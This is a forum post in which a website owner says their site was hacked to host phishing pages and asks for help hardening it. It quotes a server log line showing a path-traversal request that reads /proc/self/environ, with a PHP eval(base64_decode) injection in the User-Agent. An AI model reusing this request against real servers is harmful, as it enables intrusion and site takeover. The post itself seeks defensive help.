A message for Linux.com registered users: We are in the process of making changes to the Linux forums. Starting Monday, 8/13/18 at 6:00 PM PT, you will be unable to access the forums. They will re-launch as soon as possible on Wednesday, 8/15/18 with new features and improved functionality. Thank you for your patience and stay tuned for the new improved forums.
My site has been used for Phishing
I have a website that someone has been able to hack and install phishing pages!
I need to set the security to make this impossible. Looking back in the logs I found this code snippet:
"GET /index.php?page=latestnews//conlib/prepend.php3?cfg[path][contenido]=../../../../../../../../../../../../..//proc/self/environ%0000 HTTP/1.1" 200 6578 "-" "<?eval(base64_decode('
After the page=latestnews there is a reference to conlib/prepend?cfg[path][contendido] which appears to install a page on the root directory from which they seem to be able to install phishing sites.
I have several sites on a dedicated FastHosts server but only 1 is being attacked?
Has anyone come across this and can recommend what to do?